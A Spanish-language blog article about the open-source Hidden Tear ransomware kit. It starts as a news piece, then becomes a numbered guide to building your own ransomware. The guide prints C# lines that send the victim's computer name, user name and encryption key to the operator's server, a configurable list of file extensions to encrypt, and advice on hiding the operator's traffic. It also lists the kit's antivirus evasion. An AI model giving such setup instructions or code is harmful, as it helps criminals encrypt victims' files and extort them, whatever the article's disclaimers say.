Cómo crear tu propio ransomware

Virus de la Policía
Con este kit, sería posible hacer nuevas versiones del Virus de la Policía en un momento.

Según ha informado recientemente un investigador turco -de nombre Utku Sen- se lleva días circulando por la web de Github una versión completamente funcional de Ransomware, cuyo código es abierto y completamente accesible para cualquiera que lo quiera descargar.

[pullquote]El creador de este ransomware afirma haberlo compartido con fines educativos. ¿Acaso controla el uso que cada uno hace del mismo? La ingenuidad humana suele costar disgustos.[/pullquote]

Esto significa que, incluso los  más “noobs” en la materia, también llamados script-kiddies, serían capaces de crear en sencillos pasos una muestra de ransomware con la que extorsionar a la gente.

Crea tu propio ransomware Hidden Tear

Con el nombre de Hidden Tear se conoce a la muestra de ransomware que tenemos frente a nosotros. Utiliza tecnología de cifrado AES y, como tantos otros, nos apremia meiante un mensaje para que paguemos.

Esta versión actual de Hidden Tear no es detectable por los antimalware y puede ser modificada rápidamente de diferentes formas. En palabras de Sen, estaríamos ante:

Un encriptador de archivos que puede ser modificado para cumplir propósitos específicos.

No requiere de conocimientos especiales para realizar los cambios, de forma que cualquiera puede ya crear su propio ransomware para intentar sacar beneficio económico.

Ransomware de “marca blanca”

El repositorio de Github recoje el conjunto de archivos del paquete, compuestos de forma individual por:

Características de Hidden Tear

  • Cifrado mediante algoritmo AES para cifrar archivos
  • Envío de clave de cifrado a un servidor
  • Cifrado/descifrado de archivos mediante un programa específico, con clave de descifrado
  • Creación de archivo en el Escritorio de Windows, con el mensaje de alerta deseado
  • Tamaño pequeño (12 KB)
  • Evasión de todos los antivirus convencionales
¿Cómo crear tu propio ransomware con Hidden Tear?

[pullquote]En este punto, recomendamos utilizar conexión HTTPS, para evitar escuchas de lo que haces.[/pullquote]

1. Necesitarás, en primer lugar, un servidor web con soporte para lenguage de scripts: PHP o Python. Deberás cambiar la siguiente línea para poner tu propia URL, donde servirás el ransomware.

string targetURL = “https://www.example.com/hidden-tear/write.php?info=”;

2. El script deberá pasar el parámetro GET a un archivo de texto. Se utilizará la función SendPassword() en el proceso de envío:

string info = computerName + “-” + userName + ” ” + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);

Hidden tear ransomware

3. Por otro lado, las extensiones de archivo afectadas puede modificarse libremente, según reza el propio documento. Sólo hay que incluirlos aquí:

var validExtensions = new[]{“.txt”, “.doc”, “.docx”, “.xls”, “.xlsx”, “.ppt”, “.pptx”, “.odt”, “.jpg”, “.png”, “.csv”, “.sql”, “.mdb”, “.sln”, “.php”, “.asp”, “.aspx”, “.html”, “.xml”, “.psd”};

hidden tear 2Aviso legal

El autor de este código dañino se pone “simpático” cuando lanza este aviso legal a los usuarios:

Aunque esto podría ser útil para algunos, existen riesgos significativos. Hidden Tear debería utilizarse sólo para fines educativos. No lo utilicéis como ransomware!. Podríais ir a la carcel símplemente por ejecutarlo, incluso si sois inocentes.

Demostración en vídeo de Hidden Tear

La demostración deja claro lo sencillo que resulta manejar esta muestra de ransomware. ¡Tened cuidado con el uso que le dáis!

Autor: Alejandro Sánchez

Alejandro es técnico micro-informático, experto en seguridad de las TIC y apasionado de la tecnología. Colabora habitualmente en diferentes publicaciones de seguridad, software y análisis de hardware entusiasta.